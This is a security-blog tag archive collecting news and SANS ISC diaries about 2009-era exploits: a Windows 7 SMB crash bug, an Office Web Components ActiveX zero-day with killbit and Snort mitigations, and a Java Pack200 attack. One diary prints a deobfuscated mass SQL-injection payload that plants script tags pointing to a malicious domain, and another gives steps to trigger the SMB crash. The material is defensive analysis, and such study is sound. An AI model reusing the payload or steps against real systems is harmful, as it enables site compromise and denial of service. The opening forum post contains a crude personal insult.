Posts Tagged ‘exploit’
Posted in Uncategorized on February 17th, 2011 by Full Disclosure
Posted by Григорий Братислава on Feb 17
Hello full-disclosure!!
I is like to warn you about rhetoric and annoyance nuisance. Is once
upon a time MustLive has maybe is one exploit to is make me say "damn
it!" howisever MustLive is how you say? pička in Croatia.
Is I top post for annoy:
1) MustLive is lonely pička with is one to many copy of cracked
Accunetix is run in background to report to full disclosure (hi is
look at me, I find vuln no one is care...
Tags: exploit |
Posted in Uncategorized on February 17th, 2011 by Gregg Keizer
Microsoft is downplaying the threat posed to Windows users by a recently-revealed vulnerability, saying it's unlikely the bug could be exploited to compromise a computer.
Tags: exploit, microsoft, windows |
Posted in Uncategorized on February 17th, 2011 by Tim Greene
The hacktivist group Anonymous used a series of simple technical and social exploits to crack the network of security-technology firm HBGary Federal, giving the company a schooling that other network security pros can learn from.
Tags: exploit |
Posted in ISC on November 13th, 2009 by ISC Handler
Mikael wrote us yesterday, telling us about a site claiming to have a zero day for SMB on both Windows 7 and Windows Server 2008 R2. Thanks for the pointer Mikael; Laurent Gaffié is the original author of this bit of code.
However, on a first try we found that the code didn't run as posted. Nothing major: one required line of code was missing, and there were some formatting issues. Given what this code does, these omissions might have been intentional, to give Microsoft a chance to get a fix in before it disseminates. The code does in fact work. The sequence to see the exploit is:
1/ On a Linux machine, ensure that port 445 is open (or that your firewall is down) and that the target Windows host and the Linux host have connectivity (a quick ping does the trick here).
2/ On that Linux box, run the resulting code: sudo python w7spolit.py. You need sudo because 445 is a privileged port (below 1024), and we're using a Linux box because port 445 is of course already taken on most Windows hosts.
3/ On the target Windows box, run net use \\x.x.x.x, where x.x.x.x is the IP address of the Linux box.
You'll see that the Windows host is now frozen: no mouse, no keyboard, and completely unresponsive on the network as well. This works on both Windows 7 and Windows Server 2008 R2 with the very latest patches applied. A link to a server running this code could easily be embedded in a web page or email, pointing out to a poison host on the internet, so this exploit is not limited to corporate networks doing file sharing. As the author states, disabling SMBv2 does not give even temporary protection. Here's hoping Microsoft scrambles the troops to get this patched before it's out in the wild.
==========================================================================================================================
Since the original post, there's been a lot of Q&A back and forth, and also some misinformation floating around. I'm hoping that the Q&A below helps clarify things:
Is the original Windows 2008 affected by this?
No - the only 2 affected operating systems are Windows 7 and Windows 2008 R2
What patch levels have been tested? Is this a problem in one patch or another?
We've only tested the 2 affected operating systems, fully patched as of 12 Nov 2009.
If I disable SMBv2, I'm not affected right?
Wrong. This affects hosts regardless of which SMB version they are running. We've tested hosts with SMBv2 disabled via both the registry method and the sc method (singly and in combination), and all are equally affected.
How does this thing spread?
It has no mechanism for propagation. Unless somebody embeds this in a worm, this is more of a curiosity than anything else. This vulnerability in itself does not have the potential to steal information or compromise system integrity. It crashes hosts, plain and simple.
Is IPv6 affected? Is this an IPv6 problem?
This is an SMB issue (tcp/445). All testing so far has been on IPv4; we haven't tested IPv6 specifically, but there's no reason to think that running SMB over IPv6 would behave any differently.
What about the firewall on windows? Does that help?
Remember that this works by you browsing to a UNC on a poison host, so the connection is outbound from the victim. The Windows firewall filters inbound connections and has no effect on this.
How can I mitigate against this in Windows? Is there a registry key or a patch I can apply?
At this time, there is no host based mitigation available. We're hoping that Microsoft comes out with a patch for this quickly. Your best protection is the same safe computing advice that we'd give any other day:
Don't browse from your servers. Ever.
Don't browse indiscriminately from your workstation (don't click links from strangers).
Don't browse to UNCs that aren't under your control (i.e. on the public internet). Ever.
Can I protect myself in any way?
YES. Your best protection in a corporation is an egress filter on your firewall. This has been a long-standing recommendation, and not just from SANS. There is no reason you should browse to Microsoft file sharing ports (tcp/445, and tcp/139 for NetBIOS over TCP) on the internet, so blocking this activity outbound on a corporate firewall is a great way to knock this problem on the head, at least as far as your corporation is concerned. Egress filters are also a wonderful way to stop the propagation (both inbound and outbound) of other malware. There are a number of papers in the SANS Reading Room ( http://www.sans.org/reading_room/ ) that deal with this subject if you want more info.
Why haven't you posted a link to the original code?
As a policy, ISC simply can't post links to zero day code. We need to report this as an important story, getting the word out to prevent the spread of FUD is key in situations like this. However, pointing to the author's blog just wouldn't be responsible. If you'd like to try this code out yourself, most search engines should be able to help you with that.
Finally, remember again that this is not like the vulnerabilities that have recently seen widespread adoption by malware. This vulnerability does not infect Windows, it simply crashes the host. Crashing hosts is not good business for criminals: remember, they write their malware to make money, and crashing your victim's host does not make any money most days. Also, it requires action by someone on the target host; they need to browse to a UNC resource on the attacker's poison host. While this vulnerability is a serious issue, I can't see a good reason for malware authors to include it in their suite. I don't expect that we'll see widespread use of this in the wild (except on security blogs of course ...)
Tags: code, exploit, linux, microsoft, News, patch, web, windows |
Posted in ISC on July 16th, 2009 by ISC Handler
One of the must-have tools for anyone doing anything related to IT security is definitely Nmap (I mean, which other tool did Trinity use, besides an SSH exploit? And hers wasn't a fake SSH exploit like the one released a couple of days ago). The Nmap developers have worked hard on this latest version, which includes some very cool things like the Nmap Scripting Engine (NSE), which we even used to detect machines infected with the Conficker worm.
There are a lot of other neat new features and improvements, so don't wait: go to http://nmap.org/5/ to download your copy of Nmap.
--
Bojan
Tags: exploit, News, ssh |
Posted in ISC on July 16th, 2009 by ISC Handler
As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.
While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent us a log of an SQL injection attempt against his web site. The SQL injection attempt looks very much like the ones we've been seeing for months:
SET @S=CAST(0x44004500430
After deobfuscation of the CAST function input, the following SQL code is revealed:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
As you can see, they are injecting a script code pointing to f1y.in, which is a known bad domain. This script contains links to two other web sites (www.jatrja.com and js.tongji.linezing.com) serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.
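The hex literal in the logged CAST() call is simply the statement above encoded as UTF-16LE (0x44 0x00 = 'D', 0x45 0x00 = 'E', 0x43 0x00 = 'C', the start of DECLARE). The following Python is an added example, not code from the diary or from the attackers: it recovers the SQL from such a request line, pulls out the injected script URL and copes with a hex literal that a log entry has cut short (an odd number of digits, as in the excerpt above). The request path, the parameter name and the re-encoded payload are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample: the statement recovered in the diary, re-encoded the way
# the attacker ships it (UTF-16LE, so every ASCII character is followed by a
# 00 byte) and wrapped in the CAST(0x...) carrier seen in the log line. The
# request path and parameter name are invented for this example.
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 "
    "or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor "
    "INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://f1y.in/j.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_PAYLOAD = INJECTED_SQL.encode("utf-16-le").hex()
SAMPLE_LOG_LINE = (
    "GET /products.asp?id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + HEX_PAYLOAD
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1"
)

CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?([^\s\"'>]+)", re.IGNORECASE)


def decode_cast_hex(hexdigits):
    """Turn the hex literal inside CAST(0x...) back into SQL text.

    Returns (text, truncated). A literal cut short by log truncation has an odd
    number of digits (the diary's 0x44004500430 is one); the dangling nibble is
    dropped and the caller is told the payload is incomplete."""
    truncated = len(hexdigits) % 2 == 1
    if truncated:
        hexdigits = hexdigits[:-1]
    raw = bytes.fromhex(hexdigits)
    # NVARCHAR payloads are UTF-16LE: every second byte of ASCII text is 00.
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        text = raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")
    else:  # VARCHAR payload, one byte per character
        text = raw.decode("latin-1")
    return text, truncated


def analyse_request(line):
    """Decode the CAST carrier in a URL-encoded request line.

    Returns None when there is no CAST(0x...) literal, otherwise the recovered
    SQL, the injected script URLs, whether the literal was cut short, and
    whether it walks sysobjects/syscolumns (the mass-update signature)."""
    decoded_line = unquote(line)
    match = CAST_HEX.search(decoded_line)
    if not match:
        return None
    sql, truncated = decode_cast_hex(match.group(1))
    lowered = sql.lower()
    return {
        "sql": sql,
        "script_urls": SCRIPT_SRC.findall(sql),
        "truncated": truncated,
        "mass_update": "sysobjects" in lowered and "syscolumns" in lowered,
    }


if __name__ == "__main__":
    result = analyse_request(SAMPLE_LOG_LINE)
    print(result["sql"])
    print("injected script(s):", result["script_urls"])
```

Run it over a web server access log and the script_urls field gives you the domains to block and to grep your own tables for; a truncated flag tells you the log line was cut before the payload ended, so the recovered SQL is a prefix only.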
The exploits end up downloading a Trojan (of course, what else) which currently has pretty poor detection (VT link): only 15 AV programs detect it, though luckily some major AV vendors are among them.
If you haven't set those killbits yet, be sure that you do now, because the number of sites exploiting this vulnerability will probably rise exponentially soon.
--
Bojan
Tags: code, exploit, News, patch, sql, web |
Posted in ISC on July 15th, 2009 by ISC Handler
One of our readers, Tom Ueltschi, sent an e-mail with details about an exploit for a Java vulnerability. While such exploits are not rare, this particular exploit targets a vulnerability that was published in December 2008 by iDefense; a reliable exploit became publicly available a couple of months ago, in April this year.
However, it took some time for the bad guys to start using this exploit in their attack kits. The vulnerability exists in Java JRE release 6, update versions lower than 13, and release 5, update versions lower than 18.
The vulnerability is in the Pack200 compression method, which is used to compress Jar files. The vulnerable code is invoked when a Pack200-compressed file is read: the exploit creates an Applet which downloads a specially crafted Pack200-compressed file. It's interesting how the attackers completely copied the publicly available exploit (they even used the same file names!), so they end up using an HTML file that creates the Applet, which in turn calls a PHP script called e.php that is needed to correctly set the Content-Encoding header.
The Applet contains shellcode, which gets executed if the vulnerability is successfully exploited. As you can guess, it downloads a Trojan which, luckily, has *some* detection (VT link), with some major names still missing it.
After checking the malicious web site, it became obvious that the exploit has been integrated with an attack kit, so we can expect this to become more common now.
Finally, I'd like to remind everyone to double check that you have the latest Java installed on your machine (and those older versions removed). Also, don't forget about those nice add-ons such as NoScript, which can limit your exposure by allowing Java or JavaScript to execute only on trusted web sites and not by default.
--
Bojan
Tags: code, exploit, News, php, web |
Posted in ISC on July 15th, 2009 by ISC Handler
Update1: The vulnerability is being actively exploited on web sites. More to follow.
Microsoft has released an advisory related to an Office Web Components ActiveX vulnerability; it is available here. This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets. The CVE entry for the vulnerability is CVE-2009-1136. Microsoft mentions that they are aware of active exploits against this vulnerability, although we at the SANS Internet Storm Center hadn't seen it used or mentioned in public as of yet (this has changed: we are now seeing active exploit pages), which may indicate it was first used in targeted rather than broad-based attacks. At the moment there is no patch; there is a workaround, and it can be automated for enterprise deployment. The specific CLSIDs to set the killbit for are:
{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}
Start working on this ASAP. The impact is remote code execution with the privileges of the logged-in user running Internet Explorer, and it might not require any user intervention beyond browsing to a nasty web site. As in: browse and be pwn3d.
Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx
KB article: http://support.microsoft.com/kb/973472
SRD blog: http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx
MSRC blog: http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx
There is a long list of affected products:
Microsoft Office XP Service Pack 3;
Microsoft Office 2003 Service Pack 3;
Microsoft Office XP Web Components Service Pack 3;
Microsoft Office Web Components 2003 Service Pack 3;
Microsoft Office 2003 Web Components for the 2007 Microsoft Office System; and
Microsoft Office Small Business Accounting 2006.
For information on how to prevent ActiveX controls from running, check out this Microsoft KB article on modifying the registry. This article describes how to deploy the change using Active Directory. If you have administrative privileges on a single system and are running Internet Explorer, you can click on this 'fixit' link to set the killbit and mitigate the vulnerability, on a home computer for example.
Update2: One other obvious mitigation step is to use an alternate web browser (i.e. other than IE) that does not support ActiveX.
Update3: We have raised the Infocon to yellow for 24 hours due to the active exploitation of this vulnerability.
Update4:We will be updating our existing diary post of domains to block with domains that are hosting this exploit as well. You can see that diary entry at the following url. http://isc.sans.org/diary.html?storyid=6739 (newly added domains are in yellow) - AndreL
Update5: Attack vectors used to exploit this vulnerability.
In the publicly known attempts to exploit the vulnerability so far, attackers just modify the published code with a fresh download location and a slightly modified malware payload.
A .cn domain is using a heavily obfuscated version of the exploit, which may become part of an attack kit (think MPack) and is similar to recent DirectShow attacks.
A highly targeted attack against an organization earlier today, which received a Microsoft Office document with embedded HTML. This one was particularly nasty: it was specifically crafted for the target, with the document tailored with contact information and subject matter specific to the targeted recipient. Analysis of the document and secondary payload found that the attacker used a firewall on the malicious server so that IP traffic from outside the targeted victim's domain/IP range would not reach the server.
Update6: This blog has additional information, with examples of code that may have been used in this attack: hxxp://safelab.spaces.live.com/blog/cns!A6B213403DBD59AF!1463.entry (obscured on purpose; some AV products will trigger on accessing the page). Another example is here: hxxp://xeye.us/blog/2009/07/one-0day/
One part of a signature looking for the exploit would be ActiveXObject("OWC10.Spreadsheet"), but that string is also used by legitimate web applications trying to open a spreadsheet, so expect false positives on it alone.
Update7: attempt at snort sigs (until something better comes along):
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MS 0day Excel ActiveX1 CVE-2009-1136"; reference:url,isc.sans.org/diary.html?storyid=6778; content:"0002E559-0000-0000-C000-000000000046"; nocase; pcre:"/OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*0002E559-0000-0000-C000-000000000046/si";)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MS 0day Excel ActiveX2 CVE-2009-1136"; reference:url,isc.sans.org/diary.html?storyid=6778; content:"0002E541-0000-0000-C000-000000000046"; nocase; pcre:"/OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*0002E541-0000-0000-C000-000000000046/si";)
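To see what these two rules do and do not catch, here is the same PCRE (with its /s and /i flags) re-implemented in Python and run over a handful of constructed HTML snippets, together with the weaker ActiveXObject indicator from Update6 flagged for review rather than alerted on. This is an added example, not code from the diary or from Snort; the snippets are made up and are not captured traffic. The ProgID pattern covers OWC11.Spreadsheet as well as the OWC10 string mentioned above, on the assumption that the second kill-bitted CLSID is the Office 2003 (OWC11) control, as the ADM template in Update9 labels it.

```python
import re

# The two CLSIDs from the advisory: the OWC10 and OWC11 Spreadsheet controls.
OWC_CLSIDS = (
    "0002E541-0000-0000-C000-000000000046",
    "0002E559-0000-0000-C000-000000000046",
)

# One compiled pattern per Snort rule: the pcre from the rules above, with its
# /s (dot-all) and /i (case-insensitive) flags. It tolerates missing quotes,
# whitespace around '=' and ':' and a missing opening brace before the CLSID.
OBJECT_RULES = {
    clsid: re.compile(
        r"OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*" + clsid,
        re.IGNORECASE | re.DOTALL,
    )
    for clsid in OWC_CLSIDS
}

# The weaker indicator from Update6: instantiation by ProgID from script.
# Legitimate intranet apps do this too, so it is flagged for review, not alerted on.
PROGID_RE = re.compile(
    r"ActiveXObject\s*\(\s*[\x22\x27]OWC1[01]\.Spreadsheet[\x22\x27]", re.IGNORECASE
)


def classify(body):
    """Return ('alert', clsid) for an OBJECT tag naming a kill-bitted CLSID,
    ('review', indicator) for a scripted OWC ProgID, ('clean', None) otherwise."""
    for clsid, rule in OBJECT_RULES.items():
        if rule.search(body):
            return "alert", clsid
    if PROGID_RE.search(body):
        return "review", "ActiveXObject(OWC1x.Spreadsheet)"
    return "clean", None


# Constructed response-body snippets, not captured traffic. The all-zero GUID
# stands in for some unrelated, legitimate control.
SAMPLES = {
    "quoted_braced": '<OBJECT classid="clsid:{0002E559-0000-0000-C000-000000000046}" id="target"></OBJECT>',
    "bare": "<object id=x classid=clsid:0002E541-0000-0000-C000-000000000046>",
    "spaced_multiline": "<object\n  classid = 'CLSID : {0002E559-0000-0000-C000-000000000046}'>",
    "progid_only": 'var s = new ActiveXObject("OWC10.Spreadsheet");',
    "other_control": '<object classid="clsid:{00000000-0000-0000-0000-000000000000}"></object>',
    "clsid_in_text": "Set the kill bit for 0002E559-0000-0000-C000-000000000046 today",
}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:<18} {classify(body)}")
```

Note the limit this exposes: the CLSID must appear literally inside an OBJECT tag in the response body. The heavily obfuscated .cn variant mentioned in Update5 can assemble the classid from string fragments in JavaScript at run time, in which case neither the content match nor the pcre fires, and the kill bit on the client is the control that actually holds.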
Update8: Metasploit have released a module exploiting the vulnerability.
Update9: Matt Hrynkow and John Silvestri have submitted .ADM files for use as Active Directory GPO templates for setting the ActiveX killbits for last week's and this week's vulnerabilities. Here is the one for the MS Office Web Components advisory 973472 / CVE-2009-1136.
--Start here--
CLASS MACHINE
CATEGORY "Windows Components"
  CATEGORY "Internet Explorer"
    POLICY "Internet Explorer - ActiveX Compatibility Disable for Microsoft Office Web Components"
      #if version >= 3
        EXPLAIN !!EXPLAIN1
      #endif
      KEYNAME "SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{011B3619-FE63-4814-8A84-15A194CE9CE3}"
      VALUENAME "Compatibility Flags"
      VALUEON NUMERIC 1024
      VALUEOFF NUMERIC 0
      ACTIONLISTON
        KEYNAME "SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0002E541-0000-0000-C000-000000000046}"
        VALUENAME "Compatibility Flags" VALUE NUMERIC 1024
        KEYNAME "SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0002E559-0000-0000-C000-000000000046}"
        VALUENAME "Compatibility Flags" VALUE NUMERIC 1024
      END ACTIONLISTON
      ACTIONLISTOFF
        KEYNAME "SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0002E541-0000-0000-C000-000000000046}"
        VALUENAME "Compatibility Flags" VALUE NUMERIC 0
        KEYNAME "SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0002E559-0000-0000-C000-000000000046}"
        VALUENAME "Compatibility Flags" VALUE NUMERIC 0
      END ACTIONLISTOFF
    END POLICY ; Internet Explorer - ActiveX Compatibility Disable for OWC10_and_OWC11
  END CATEGORY ; Internet Explorer
END CATEGORY ; Windows Components
CLASS USER
[Strings]
EXPLAIN1="Enable this policy to implement workaround documented for Microsoft Security Advisory (973472)\n\n\nhttp://www.microsoft.com/technet/security/advisory/973472.mspx\nhttp://isc.sans.org/diary.html?storyid=6778\n"
--End here--
Update10: This MSDN blog has 32 and 64 bit versions of the Active Directory GPO ADM files and .reg files that should mitigate this vulnerability: http://blogs.msdn.com/askie/archive/2009/07/14/group-policy-adm-template-to-implement-the-workaround-from-security-advisory-973472.aspx The one posted above in Update9 apparently only works on 32 bit, and is missing the backslashes. Thanks Jim and Brian for letting us know.
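Whichever of the templates above you push out, the kill bit needs verifying afterwards, and on 64-bit hosts it needs verifying twice, because 32-bit Internet Explorer reads its ActiveX Compatibility key under Wow6432Node. The following Python audit is an added example, not code from the diary, from the submitters or from Microsoft: it parses a .reg export of those keys, tests the 0x400 kill bit (rather than comparing the whole DWORD, since other compatibility flags may be OR'd into the same value) for both CLSIDs in both registry views, and builds a .reg fix that ORs the bit into whatever is already there instead of overwriting it, which is what a bare VALUE NUMERIC 1024 does. The export text is constructed for the example, and the unrelated flag value 1 in it was chosen only to show the point.

```python
import re

KILL_BIT = 0x400  # "Compatibility Flags" bit that stops IE from loading a control

# The two CLSIDs from the advisory: the OWC10 and OWC11 Spreadsheet controls.
OWC_CLSIDS = (
    "0002E541-0000-0000-C000-000000000046",
    "0002E559-0000-0000-C000-000000000046",
)
# On 64-bit Windows, 32-bit IE reads its ActiveX Compatibility key under
# Wow6432Node, so both views must carry the kill bit.
VIEWS = ("SOFTWARE", "SOFTWARE\\Wow6432Node")

KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\(SOFTWARE(?:\\Wow6432Node)?)\\Microsoft\\Internet Explorer"
    r"\\ActiveX Compatibility\\\{([0-9A-Fa-f-]{36})\}\]$",
    re.IGNORECASE,
)
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$', re.IGNORECASE)


def parse_reg_export(text):
    """Map (view, CLSID) -> Compatibility Flags DWORD from .reg export text.
    `reg export` writes UTF-16LE with a BOM; read such a file with encoding="utf-16"."""
    flags = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = (key.group(1).upper(), key.group(2).upper())
            continue
        value = FLAGS_RE.match(line)
        if value and current:
            flags[current] = int(value.group(1), 16)
    return flags


def audit(text, clsids=OWC_CLSIDS, views=VIEWS):
    """Return {(view, clsid): flags}, with None where the key is absent."""
    flags = parse_reg_export(text)
    return {
        (view, clsid): flags.get((view.upper(), clsid.upper()))
        for view in views
        for clsid in clsids
    }


def kill_bit_set(value):
    """Test the bit, not equality: other flags may share the DWORD."""
    return value is not None and bool(value & KILL_BIT)


def remediation_reg(audit_result):
    """.reg text that ORs the kill bit into every entry the audit found missing
    or unset, preserving flags already present; protected entries are skipped."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for (view, clsid), value in sorted(audit_result.items()):
        if kill_bit_set(value):
            continue
        lines.append(
            f"[HKEY_LOCAL_MACHINE\\{view}\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{{{clsid}}}]"
        )
        lines.append(f'"Compatibility Flags"=dword:{(value or 0) | KILL_BIT:08x}')
        lines.append("")
    return "\n".join(lines)


# Constructed text standing in for the concatenated exports of the native and
# Wow6432Node ActiveX Compatibility keys on a 64-bit host: OWC10 done in both
# views, OWC11 carrying an unrelated flag (value chosen for the example) in the
# native view and missing from the Wow6432Node view.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{0002E541-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{0002E559-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000001

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{0002E541-0000-0000-C000-000000000046}]
"Compatibility Flags"=dword:00000400
"""

if __name__ == "__main__":
    result = audit(SAMPLE_EXPORT)
    for (view, clsid), value in sorted(result.items()):
        if kill_bit_set(value):
            state = "kill bit set"
        elif value is None:
            state = "key missing"
        else:
            state = f"kill bit NOT set (flags=0x{value:08x})"
        print(f"{view:<24} {clsid}  {state}")
    print(remediation_reg(result))
```

On a real host, export both keys with reg export and feed the files to audit(); the output of remediation_reg() can be imported with regedit /s. A 32-bit host simply reports the Wow6432Node entries as missing, which is expected there and can be ignored.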
If you see exploit code for this vulnerability, or have knowledge of it being used in an attack please let us know via our contact page.
Thanks to all who have contributed to this diary!
Cheers,
Adrien de Beaupré
EWA-Canada.com
Teaching SANS Cutting-Edge Hacking Techniques in Ottawa this September.
Tags: asp, code, exploit, microsoft, News, patch, web, windows |
Posted in Security Tools, Tools on June 26th, 2009 by SecurityDatabase
SAINT is the Security Administrator's Integrated Network Tool. It is used to non-intrusively detect security vulnerabilities on any remote target, including servers, workstations, networking devices, and other types of nodes. It will also gather information such as operating system types and open ports. The SAINT graphical user interface provides access to SAINT's data management, scan configuration, scan scheduling, and data analysis capabilities through a web browser. Different aspects of (...)
Security Tools / Saint, Automated Exploiter, Application Scanner, Vulnerability Management
Tags: asp, exploit, Tools, web |
Posted in Secunia on November 30th, 2008 by Secunia
Ubuntu has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions and gain escalated privileges, and by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.
http://secunia.com/Advisories/32918/
NOTE: This RSS feed does not include information about updated Secunia advisories. You should note that Secunia on average issues more than 20 updated advisories per day, containing information about exploit and patch availability, new and in depth research, and all other details that are relevant. Learn more about receiving complete and customised Secunia advisory information:
http://secunia.com/advisories/business_solutions/
Tags: exploit, kernel, patch, ubuntu |